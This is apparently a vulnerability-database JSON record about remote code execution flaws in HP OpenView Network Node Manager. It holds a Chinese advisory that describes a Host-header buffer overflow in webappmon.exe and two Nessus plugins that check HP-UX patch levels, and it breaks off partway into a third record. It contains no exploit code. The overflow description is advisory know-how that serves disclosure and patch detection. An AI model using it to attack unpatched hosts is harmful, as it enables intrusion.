ID\uff1aCNCVE-20090898\r\nCNCVE-20093845\r\nCNCVE-20093846\r\nCNCVE-20093849\r\nCNCVE-20093848\r\nCNCVE-20094176\r\nCNCVE-20094177\r\nCNCVE-20094178\r\nCNCVE-20094179\r\nCNCVE-20094180\r\nCNCVE-20094181\r\nCNCVE-20093847\r\nCNCVE-20093845\r\nCNCVE-20093849\r\nCNCVE-20093848\r\nCNCVE-20093849\r\nCNCVE-20094179\r\nCNCVE-20093846\r\nCNCVE-20094176\r\nCNCVE-20094178\r\nCNCVE-20094181\r\nCNCVE-20094180\r\nCNCVE-20094177\r\n \r\nwebappmon.exe CGI\u5e94\u7528\u7a0b\u5e8f\u5b58\u5728\u8bbe\u8ba1\u7f3a\u9677\uff0c\u8fdb\u7a0b\u4f7f\u7528strcat\u8c03\u7528\u628aHTTP\u8bf7\u6c42\u4e2d\u7684HOST\u5934\u5b57\u6bb5\u6570\u636e\u62f7\u8d1d\u5230\u4f4d\u4e8e.DATA\u6bb5\u4e2d\u7684\u56fa\u5b9a\u957f\u5ea6\u7f13\u51b2\u533a\u4e2d\uff0c\u63d0\u4f9b\u8d85\u957f\u5b57\u7b26\u4e32\u53ef\u6ea2\u51fa\u8fd9\u4e2a\u7f13\u51b2\u533a\u5bfc\u81f4\u4efb\u610f\u4ee3\u7801\u6267\u884c\u3002\n\nHP OpenView Network Node Manager 7.50 Windows 2000/XP\r\nHP OpenView Network Node Manager 7.50 Solaris\r\nHP OpenView Network Node Manager 7.50 Linux\r\nHP OpenView Network Node Manager 7.50 HP-UX 11.X\r\nHP OpenView Network Node Manager 7.50 \r\nHP OpenView Network Node Manager 7.53\r\nHP OpenView Network Node Manager 7.51\r\nHP OpenView Network Node Manager 7.50\r\nHP OpenView Network Node Manager 7.01\n\u7528\u6237\u53ef\u53c2\u8003\u5982\u4e0b\u5b89\u5168\u516c\u544a\u83b7\u5f97\u8865\u4e01\u4fe1\u606f\uff1a\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01950877", "cvss3": {}, "published": "2009-12-14T00:00:00", "title": "HP OpenView Network Node Manager\u591a\u4e2a\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-3845", "CVE-2009-3846", "CVE-2009-3848", "CVE-2009-3849", "CVE-2009-4176", "CVE-2009-4177", "CVE-2009-4178", "CVE-2009-4179", "CVE-2009-4180", "CVE-2009-4181"], "modified": "2009-12-14T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15058", "id": "SSV:15058", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-08-19T13:04:28", "description": "s700_800 11.11 OV NNM7.01 Intermediate Patch 13 : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential vulnerability has been identified with HP OpenView Network Node Manager (OV NNM). The vulnerability could be exploited remotely to execute arbitrary code. (HPSBMA02424 SSRT080125)\n\n - Potential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). These vulnerabilities could be exploited remotely to execute arbitrary code. References: CVE-2009-0898 (SSRT090101) CVE-2009-3845 (SSRT090037, ZDI-CAN-453) CVE-2009-3846 (SSRT090122, ZDI-CAN-526) CVE-2009-3847 (SSRT090128, ZDI-CAN-532) CVE-2009-3848 (SSRT090129, ZDI-CAN-522) CVE-2009-3849 (SSRT090130, ZDI-CAN-523) CVE-2009-4176 (SSRT090131, ZDI-CAN-532) CVE-2009-4177 (SSRT090132, ZDI-CAN-538) CVE-2009-4178 (SSRT090133, ZDI-CAN-539) CVE-2009-4179 (SSRT090134, ZDI-CAN-540) CVE-2009-4180 (SSRT090135, ZDI-CAN-542) CVE-2009-4181 (SSRT090164, ZDI-CAN-549). (HPSBMA02483 SSRT090257)\n\n - Potential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). These vulnerabilities could be exploited remotely to allow execution of arbitrary code. (HPSBMA02400 SSRT080144)\n\n - Potential vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). The vulnerabilities could be exploited remotely to execute arbitrary code. (HPSBMA02416 SSRT090008)\n\n - Potential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). These vulnerabilities could be exploited remotely to execute arbitrary code. References: CVE-2010-1550 (SSRT090225, ZDI-CAN-563) CVE-2010-1551 (SSRT090226, ZDI-CAN-564) CVE-2010-1552 (SSRT090227, ZDI-CAN-566) CVE-2010-1553 (SSRT090228, ZDI-CAN-573) CVE-2010-1554 (SSRT090229, ZDI-CAN-574) CVE-2010-1555 (SSRT090230, ZDI-CAN-575).\n (HPSBMA02527 SSRT010098)\n\n - A potential vulnerability has been identified with HP OpenView Network Node Manager (OV NNM). The vulnerability could be exploited remotely to execute arbitrary code. (HPSBMA02425 SSRT080091)", "cvss3": {"score": null, "vector": null}, "published": "2010-05-10T00:00:00", "type": "nessus", "title": "HP-UX PHSS_40705 : s700_800 11.11 OV NNM7.01 Intermediate Patch 13", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-0067", "CVE-2008-2438", "CVE-2009-0720", "CVE-2009-0898", "CVE-2009-0920", "CVE-2009-0921", "CVE-2009-3845", "CVE-2009-3846", "CVE-2009-3847", "CVE-2009-3848", "CVE-2009-3849", "CVE-2009-4176", "CVE-2009-4177", "CVE-2009-4178", "CVE-2009-4179", "CVE-2009-4180", "CVE-2009-4181", "CVE-2010-1550", "CVE-2010-1551", "CVE-2010-1552", "CVE-2010-1553", "CVE-2010-1554", "CVE-2010-1555"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_40705.NASL", "href": "https://www.tenable.com/plugins/nessus/46261", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_40705. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(46261);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2008-0067\", \"CVE-2008-2438\", \"CVE-2009-0720\", \"CVE-2009-0898\", \"CVE-2009-0920\", \"CVE-2009-0921\", \"CVE-2009-3845\", \"CVE-2009-3846\", \"CVE-2009-3847\", \"CVE-2009-3848\", \"CVE-2009-3849\", \"CVE-2009-4176\", \"CVE-2009-4177\", \"CVE-2009-4178\", \"CVE-2009-4179\", \"CVE-2009-4180\", \"CVE-2009-4181\", \"CVE-2010-1550\", \"CVE-2010-1551\", \"CVE-2010-1552\", \"CVE-2010-1553\", \"CVE-2010-1554\", \"CVE-2010-1555\");\n script_bugtraq_id(34738, 34812);\n script_xref(name:\"HP\", value:\"emr_na-c01646081\");\n script_xref(name:\"HP\", value:\"emr_na-c01696729\");\n script_xref(name:\"HP\", value:\"emr_na-c01723303\");\n script_xref(name:\"HP\", value:\"emr_na-c01728300\");\n script_xref(name:\"HP\", value:\"emr_na-c01950877\");\n script_xref(name:\"HP\", value:\"emr_na-c02153379\");\n script_xref(name:\"HP\", value:\"SSRT010098\");\n script_xref(name:\"HP\", value:\"SSRT080091\");\n script_xref(name:\"HP\", value:\"SSRT080125\");\n script_xref(name:\"HP\", value:\"SSRT080144\");\n script_xref(name:\"HP\", value:\"SSRT090008\");\n script_xref(name:\"HP\", value:\"SSRT090257\");\n\n script_name(english:\"HP-UX PHSS_40705 : s700_800 11.11 OV NNM7.01 Intermediate Patch 13\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.11 OV NNM7.01 Intermediate Patch 13 : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential vulnerability has been identified with HP\n OpenView Network Node Manager (OV NNM). The\n vulnerability could be exploited remotely to execute\n arbitrary code. (HPSBMA02424 SSRT080125)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code. References: CVE-2009-0898 (SSRT090101)\n CVE-2009-3845 (SSRT090037, ZDI-CAN-453) CVE-2009-3846\n (SSRT090122, ZDI-CAN-526) CVE-2009-3847 (SSRT090128,\n ZDI-CAN-532) CVE-2009-3848 (SSRT090129, ZDI-CAN-522)\n CVE-2009-3849 (SSRT090130, ZDI-CAN-523) CVE-2009-4176\n (SSRT090131, ZDI-CAN-532) CVE-2009-4177 (SSRT090132,\n ZDI-CAN-538) CVE-2009-4178 (SSRT090133, ZDI-CAN-539)\n CVE-2009-4179 (SSRT090134, ZDI-CAN-540) CVE-2009-4180\n (SSRT090135, ZDI-CAN-542) CVE-2009-4181 (SSRT090164,\n ZDI-CAN-549). (HPSBMA02483 SSRT090257)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to allow\n execution of arbitrary code. (HPSBMA02400 SSRT080144)\n\n - Potential vulnerabilities have been identified with HP\n OpenView Network Node Manager (OV NNM). The\n vulnerabilities could be exploited remotely to execute\n arbitrary code. (HPSBMA02416 SSRT090008)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code. References: CVE-2010-1550 (SSRT090225,\n ZDI-CAN-563) CVE-2010-1551 (SSRT090226, ZDI-CAN-564)\n CVE-2010-1552 (SSRT090227, ZDI-CAN-566) CVE-2010-1553\n (SSRT090228, ZDI-CAN-573) CVE-2010-1554 (SSRT090229,\n ZDI-CAN-574) CVE-2010-1555 (SSRT090230, ZDI-CAN-575).\n (HPSBMA02527 SSRT010098)\n\n - A potential vulnerability has been identified with HP\n OpenView Network Node Manager (OV NNM). The\n vulnerability could be exploited remotely to execute\n arbitrary code. (HPSBMA02425 SSRT080091)\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01646081\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cdefacfb\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01696729\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ed695dee\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01723303\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?45827469\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01728300\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0bbcab1d\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01950877\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?422f4693\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d5f413ca\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_40705 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n script_cwe_id(94, 119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/26\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2010/05/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/05/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.11\"))\n{\n exit(0, \"The host is not affected since PHSS_40705 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHSS_40705\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-CORE\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-PD\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-PESA\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVMIB-CONTRIB\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNM-RUN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-JPN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-SCH\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVRPT-RUN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-JPN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-SCH\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgrMan.OVNNM-RUN-MAN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVDB-RUN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVEVENT-MIN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVMIN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVSNMP-MIN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWIN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-EVNT\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-FW\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-SRV\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVEVENTMIN-MAN\", version:\"B.07.01.00\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:05:58", "description": "s700_800 11.X OV NNM7.53 PA-RISC Intermediate Patch 25 : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). These vulnerabilities could be exploited remotely to execute arbitrary code. References: CVE-2009-0898 (SSRT090101) CVE-2009-3845 (SSRT090037, ZDI-CAN-453) CVE-2009-3846 (SSRT090122, ZDI-CAN-526) CVE-2009-3847 (SSRT090128, ZDI-CAN-532) CVE-2009-3848 (SSRT090129, ZDI-CAN-522) CVE-2009-3849 (SSRT090130, ZDI-CAN-523) CVE-2009-4176 (SSRT090131, ZDI-CAN-532) CVE-2009-4177 (SSRT090132, ZDI-CAN-538) CVE-2009-4178 (SSRT090133, ZDI-CAN-539) CVE-2009-4179 (SSRT090134, ZDI-CAN-540) CVE-2009-4180 (SSRT090135, ZDI-CAN-542) CVE-2009-4181 (SSRT090164, ZDI-CAN-549). (HPSBMA02483 SSRT090257)\n\n - Potential security vulnerabilities have been identified with the Java Runtime Environment (JRE) and Java Developer Kit (JDK) delivered with HP OpenView Network Node Manager (OV NNM). These vulnerabilities may allow remote unauthorized access, privilege escalation, execution of arbitrary code, and creation of a Denial of Service (DoS) . (HPSBMA02486 SSRT090049)", "cvss3": {"score": null, "vector": null}, "published": "2009-12-14T00:00:00", "type": "nessus", "title": "HP-UX PHSS_40374 : s700_800 11.X OV NNM7.53 PA-RISC Intermediate Patch 25", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-2086", "CVE-2008-5339", "CVE-2008-5340", "CVE-2008-5341", "CVE-2008-5342", "CVE-2008-5343", "CVE-2008-5344", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5348", "CVE-2008-5350", "CVE-2008-5351", "CVE-2008-5353", "CVE-2008-5354", "CVE-2008-5356", "CVE-2008-5357", "CVE-2008-5358", "CVE-2008-5359", "CVE-2008-5360", "CVE-2009-0898", "CVE-2009-3845", "CVE-2009-3846", "CVE-2009-3847", "CVE-2009-3848", "CVE-2009-3849", "CVE-2009-4176", "CVE-2009-4177", "CVE-2009-4178", "CVE-2009-4179", "CVE-2009-4180", "CVE-2009-4181"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_40374.NASL", "href": "https://www.tenable.com/plugins/nessus/43142", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_40374. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43142);\n script_version(\"1.39\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5359\", \"CVE-2008-5360\", \"CVE-2009-0898\", \"CVE-2009-3845\", \"CVE-2009-3846\", \"CVE-2009-3847\", \"CVE-2009-3848\", \"CVE-2009-3849\", \"CVE-2009-4176\", \"CVE-2009-4177\", \"CVE-2009-4178\", \"CVE-2009-4179\", \"CVE-2009-4180\", \"CVE-2009-4181\");\n script_xref(name:\"HP\", value:\"emr_na-c01950877\");\n script_xref(name:\"HP\", value:\"emr_na-c02000725\");\n script_xref(name:\"HP\", value:\"SSRT090049\");\n script_xref(name:\"HP\", value:\"SSRT090257\");\n\n script_name(english:\"HP-UX PHSS_40374 : s700_800 11.X OV NNM7.53 PA-RISC Intermediate Patch 25\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.X OV NNM7.53 PA-RISC Intermediate Patch 25 : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code. References: CVE-2009-0898 (SSRT090101)\n CVE-2009-3845 (SSRT090037, ZDI-CAN-453) CVE-2009-3846\n (SSRT090122, ZDI-CAN-526) CVE-2009-3847 (SSRT090128,\n ZDI-CAN-532) CVE-2009-3848 (SSRT090129, ZDI-CAN-522)\n CVE-2009-3849 (SSRT090130, ZDI-CAN-523) CVE-2009-4176\n (SSRT090131, ZDI-CAN-532) CVE-2009-4177 (SSRT090132,\n ZDI-CAN-538) CVE-2009-4178 (SSRT090133, ZDI-CAN-539)\n CVE-2009-4179 (SSRT090134, ZDI-CAN-540) CVE-2009-4180\n (SSRT090135, ZDI-CAN-542) CVE-2009-4181 (SSRT090164,\n ZDI-CAN-549). (HPSBMA02483 SSRT090257)\n\n - Potential security vulnerabilities have been identified\n with the Java Runtime Environment (JRE) and Java\n Developer Kit (JDK) delivered with HP OpenView Network\n Node Manager (OV NNM). These vulnerabilities may allow\n remote unauthorized access, privilege escalation,\n execution of arbitrary code, and creation of a Denial of\n Service (DoS) . (HPSBMA02486 SSRT090049)\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01950877\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?422f4693\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02000725\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?72ecd727\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_40374 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n script_cwe_id(94, 119, 189, 200, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/26\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2010/02/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.11 11.23 11.31\", proc:\"parisc\"))\n{\n exit(0, \"The host is not affected since PHSS_40374 applies to a different OS release / architecture.\");\n}\n\npatches = make_list(\"PHSS_40374\", \"PHSS_40707\", \"PHSS_41242\", \"PHSS_41606\", \"PHSS_41857\", \"PHSS_42232\", \"PHSS_43046\", \"PHSS_43353\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-CORE\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-IPV6\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-JPN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-PD\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-PESA\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVMIB-CONTRIB\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNM-RUN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-JPN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-KOR\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-SCH\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVRPT-RUN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-JPN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-KOR\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-SCH\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgrMan.OVNNM-RUN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgrRtDOC.OVNNM-ENG-DOC\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVDB-RUN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVEVENT-MIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVMIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVPMD-MIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVSNMP-MIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-EVNT\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-FW\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-SRV\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVEVENTMIN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVMIN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVSNMP-MIN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVWIN-MAN\", version:\"B.07.50.00\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:05:45", "description": "s700_800 11.X OV NNM7.53 IA-64 Intermediate Patch 25 : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified with the Java Runtime Environment (JRE) and Java Developer Kit (JDK) delivered with HP OpenView Network Node Manager (OV NNM). These vulnerabilities may allow remote unauthorized access, privilege escalation, execution of arbitrary code, and creation of a Denial of Service (DoS) . (HPSBMA02486 SSRT090049)\n\n - Potential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). These vulnerabilities could be exploited remotely to execute arbitrary code. References: CVE-2009-0898 (SSRT090101) CVE-2009-3845 (SSRT090037, ZDI-CAN-453) CVE-2009-3846 (SSRT090122, ZDI-CAN-526) CVE-2009-3847 (SSRT090128, ZDI-CAN-532) CVE-2009-3848 (SSRT090129, ZDI-CAN-522) CVE-2009-3849 (SSRT090130, ZDI-CAN-523) CVE-2009-4176 (SSRT090131, ZDI-CAN-532) CVE-2009-4177 (SSRT090132, ZDI-CAN-538) CVE-2009-4178 (SSRT090133, ZDI-CAN-539) CVE-2009-4179 (SSRT090134, ZDI-CAN-540) CVE-2009-4180 (SSRT090135, ZDI-CAN-542) CVE-2009-4181 (SSRT090164, ZDI-CAN-549). (HPSBMA02483 SSRT090257)", 